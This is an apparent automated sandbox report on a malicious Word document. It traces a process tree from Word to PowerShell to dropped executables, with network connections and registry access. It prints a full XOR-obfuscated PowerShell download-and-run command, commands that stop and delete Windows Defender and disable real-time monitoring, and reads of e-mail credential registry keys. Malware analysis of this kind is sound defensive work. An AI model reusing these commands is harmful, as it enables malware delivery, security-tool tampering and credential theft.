VMRay Analyzer Report for Sample #64186
VMRay Analyzer
2.3.0
URI
comprealm.net
Resolved_To
Address
184.168.46.18
URI
www.icb.cl
Resolved_To
Address
190.196.2.210
Process
1
2368
winword.exe
1312
winword.exe
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE"
C:\Users\kFT6uTQW\Desktop\
c:\program files (x86)\microsoft office\office12\winword.exe
Child_Of
Created
Opened
Opened
Opened
Created
Opened
Process
2
2568
powershell.exe
2368
powershell.exe
PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'')
C:\Users\kFT6uTQW\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Read_From
Read_From
Read_From
Read_From
Read_From
Read_From
Read_From
Read_From
Read_From
Read_From
Read_From
Read_From
Deleted
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Read_From
Connected_To
Connected_To
Process
3
2880
280.exe
2568
280.exe
"C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"
C:\Users\kFT6uTQW\Desktop\
c:\users\kft6utqw\appdata\local\temp\280.exe
Child_Of
Created
Created
Created
Process
4
2896
280.exe
2880
280.exe
"C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"
C:\Users\kFT6uTQW\Desktop\
c:\users\kft6utqw\appdata\local\temp\280.exe
Child_Of
Created
Deleted
Created
Moved
Created
Created
Created
Process
5
2916
syncpack.exe
2896
syncpack.exe
"C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
C:\Users\kFT6uTQW\Desktop\
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Child_Of
Created
Created
Created
Process
6
2928
syncpack.exe
2916
syncpack.exe
"C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
C:\Users\kFT6uTQW\Desktop\
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Created
Copied
Opened
Opened
Opened
Deleted
Deleted
Deleted
Wrote_To
Created
Created
Created
Created
Connected_To
Connected_To
Connected_To
Connected_To
Connected_To
Connected_To
Connected_To
Process
8
1268
syncpack.exe
2928
syncpack.exe
"C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp"
C:\Users\kFT6uTQW\Desktop\
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Read_From
Read_From
Read_From
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
9
100
oyvgkgw.exe
2928
oyvgkgw.exe
"C:\ProgramData\oyvGkGw.exe"
C:\Users\kFT6uTQW\Desktop\
c:\programdata\oyvgkgw.exe
Child_Of
Created
Opened
Opened
Opened
Created
Opened
Opened
Process
10
2208
syncpack.exe
2928
syncpack.exe
"C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"
C:\Users\kFT6uTQW\Desktop\
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Created
Opened
Opened
Opened
Opened
Process
11
1832
syncpack.exe
2928
syncpack.exe
"C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp"
C:\Users\kFT6uTQW\Desktop\
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Read_From
Read_From
Read_From
Read_From
Created
Opened
Opened
Opened
Opened
Process
12
2100
syncpack_.exe
2928
syncpack_.exe
"C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"
C:\Users\kFT6uTQW\Desktop\
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe
Opened
Opened
Opened
Opened
Process
13
1972
surtq5qk9h.exe
2928
surtq5qk9h.exe
"C:\ProgramData\suRtQ5QK9h.exe"
C:\Users\kFT6uTQW\Desktop\
c:\programdata\surtq5qk9h.exe
Opened
Opened
Opened
Created
Opened
Process
14
1580
oyvgkgw.exe
100
oyvgkgw.exe
"C:\ProgramData\oyvGkGw.exe"
C:\Users\kFT6uTQW\Desktop\
c:\programdata\oyvgkgw.exe
Child_Of
Child_Of
Child_Of
Child_Of
Created
Copied
Created
Created
Modified_Properties_Of
Modified_Properties_Of
Process
15
316
cmd.exe
1580
cmd.exe
/c sc stop WinDefend
C:\Windows\system32\
c:\windows\syswow64\cmd.exe
Child_Of
Opened
Opened
Opened
Opened
Opened
Process
16
1916
cmd.exe
1580
cmd.exe
/c sc delete WinDefend
C:\Windows\system32\
c:\windows\syswow64\cmd.exe
Child_Of
Opened
Opened
Opened
Opened
Opened
Process
17
1608
cmd.exe
1580
cmd.exe
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\
c:\windows\syswow64\cmd.exe
Child_Of
Opened
Opened
Opened
Opened
Opened
Process
18
2324
powershell.exe
1608
powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
19
2468
sc.exe
1916
sc.exe
sc delete WinDefend
C:\Windows\system32\
c:\windows\syswow64\sc.exe
Opened
Process
20
2520
sc.exe
316
sc.exe
sc stop WinDefend
C:\Windows\system32\
c:\windows\syswow64\sc.exe
Opened
Process
21
512
dllhost.exe
584
dllhost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
C:\Windows\system32\
c:\windows\syswow64\dllhost.exe
Child_Of
Process
22
980
oyvhkhw.exe
512
oyvhkhw.exe
"C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe"
C:\Windows\system32\
c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe
Opened
Opened
Opened
Created
Opened
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
users\kft6utqw\appdata\local\temp\vbe
users\kft6utqw\appdata\local\temp\vbe
c:\
c:\users\kft6utqw\appdata\local\temp\vbe
WinRegistryKey
8804558B-B773-11d1-BC3E-0000F87552E7
INVALID
File
STD_INPUT_HANDLE
File
windows\syswow64\windowspowershell\v1.0\getevent.types.ps1xml
windows\syswow64\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\syswow64\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\syswow64\windowspowershell\v1.0\types.ps1xml
windows\syswow64\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\syswow64\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\syswow64\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\syswow64\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\syswow64\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\syswow64\windowspowershell\v1.0\wsman.format.ps1xml
windows\syswow64\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\syswow64\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\syswow64\windowspowershell\v1.0\certificate.format.ps1xml
windows\syswow64\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\syswow64\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\syswow64\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\syswow64\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\syswow64\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\syswow64\windowspowershell\v1.0\filesystem.format.ps1xml
windows\syswow64\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\syswow64\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\syswow64\windowspowershell\v1.0\help.format.ps1xml
windows\syswow64\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\syswow64\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\syswow64\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\syswow64\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\syswow64\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\syswow64\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\syswow64\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\syswow64\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\syswow64\windowspowershell\v1.0\registry.format.ps1xml
windows\syswow64\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\syswow64\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework\v2.0.50727\config\machine.config
windows\microsoft.net\framework\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework\v2.0.50727\config\machine.config
config
File
users\kft6utqw\appdata\local\temp\280.exe
users\kft6utqw\appdata\local\temp\280.exe
c:\
c:\users\kft6utqw\appdata\local\temp\280.exe
exe
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
File
conout$
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
Mutex
Global\.net clr networking
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\ODiag
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OSession
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\ODiag
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OSession
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\ODiag
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OSession
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\ODiag
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OSession
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
comprealm.net
DNSRecord
www.icb.cl
SocketAddress
www.icb.cl
80
NetworkConnection
HTTP
www.icb.cl
80
URI
www.icb.cl/ZxavoDe/
Contains
URI
None
Mutex
PEMA08
Mutex
PEMB40
File
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe:zone.identifier
File
users\kft6utqw\appdata\local\temp\280.exe
users\kft6utqw\appdata\local\temp\280.exe
c:\
c:\users\kft6utqw\appdata\local\temp\280.exe
exe
File
Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe
Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe
C:\
C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe
exe
MD5
bc1a4dc38f3236982d47496a1151f33f
SHA1
d112719238664d7996048614d75db8a67fc50fc5
SHA256
85f328a811ca9f10ad82bc3c68d3c348cb069d8378400bf191bb515a6aa63473
Moved_To
File
Users\kFT6uTQW\AppData\Local\Temp\280.exe
Users\kFT6uTQW\AppData\Local\Temp\280.exe
C:\
C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe
exe
Moved_From
Mutex
Global\I78B0A7D7
Mutex
Global\M78B0A7D7
Mutex
PEMB50
Mutex
PEMB64
File
users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe
users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe
c:\
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe
exe
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Copied_To
File
windows\system32\alg.exe
windows\system32\alg.exe
c:\
c:\windows\system32\alg.exe
exe
Copied_From
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
users\kft6utqw\appdata\local\temp\d3a3.tmp
users\kft6utqw\appdata\local\temp\d3a3.tmp
c:\
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp
tmp
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
File
users\kft6utqw\appdata\local\temp\d3d3.tmp
users\kft6utqw\appdata\local\temp\d3d3.tmp
c:\
c:\users\kft6utqw\appdata\local\temp\d3d3.tmp
tmp
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
File
users\kft6utqw\appdata\local\temp\d3d4.tmp
users\kft6utqw\appdata\local\temp\d3d4.tmp
c:\
c:\users\kft6utqw\appdata\local\temp\d3d4.tmp
tmp
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
File
programdata\oyvgkgw.exe
programdata\oyvgkgw.exe
c:\
c:\programdata\oyvgkgw.exe
exe
MD5
cbe11e9a9e71737f15e8f1c606ad8d8c
SHA1
2d4575457d337753a57b7941d13ac9665342641a
SHA256
6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343
Mutex
Global\Nx357ECDE7
SocketAddress
197.245.46.11
80
NetworkConnection
HTTP
197.245.46.11
80
SocketAddress
216.46.44.93
80
NetworkConnection
HTTP
216.46.44.93
80
SocketAddress
94.70.244.227
80
NetworkConnection
HTTP
94.70.244.227
80
URI
197.245.46.11
Contains
URI
216.46.44.93
Contains
URI
http://94.70.244.227:80/whoami.php
Contains
URI
94.70.244.227
URI
94.70.244.227
Contains
File
users\kft6utqw\appdata\local\microsoft\windows mail\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount
users\kft6utqw\appdata\local\microsoft\windows mail\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount
c:\
c:\users\kft6utqw\appdata\local\microsoft\windows mail\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount
oeaccount
File
users\kft6utqw\appdata\local\microsoft\windows mail\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount
users\kft6utqw\appdata\local\microsoft\windows mail\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount
c:\
c:\users\kft6utqw\appdata\local\microsoft\windows mail\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount
oeaccount
File
users\kft6utqw\appdata\local\microsoft\windows mail\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount
users\kft6utqw\appdata\local\microsoft\windows mail\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount
c:\
c:\users\kft6utqw\appdata\local\microsoft\windows mail\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount
oeaccount
File
users\kft6utqw\appdata\local\temp\d3a3.tmp
users\kft6utqw\appdata\local\temp\d3a3.tmp
c:\
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp
tmp
WinRegistryKey
Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}
HKEY_CURRENT_USER
Username
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER
POP3 User
IMAP User
HTTP User
SMTP User
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER
POP3 User
POP3 Server
Display Name
Email
SMTP Server
SMTP Port
POP3 Port
POP3 Use SPA
POP3 Password
IMAP User
HTTP User
SMTP User
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER
POP3 User
IMAP User
HTTP User
SMTP User
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER
POP3 User
IMAP User
HTTP User
SMTP User
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders
HKEY_CURRENT_USER
POP3 User
IMAP User
HTTP User
SMTP User
WinRegistryKey
Software\Qualcomm\Eudora\CommandLine
HKEY_CURRENT_USER
WinRegistryKey
Software\Classes\Software\Qualcomm\Eudora\CommandLine\current
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Mozilla\Mozilla Thunderbird
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Google\Google Talk\Accounts
HKEY_CURRENT_USER
WinRegistryKey
Software\Google\Google Desktop\Mailboxes
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Internet Account Manager\Accounts
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
HKEY_CURRENT_USER
WinRegistryKey
Identities
HKEY_CURRENT_USER
WinRegistryKey
Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts
HKEY_CURRENT_USER
WinRegistryKey
Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER
WinRegistryKey
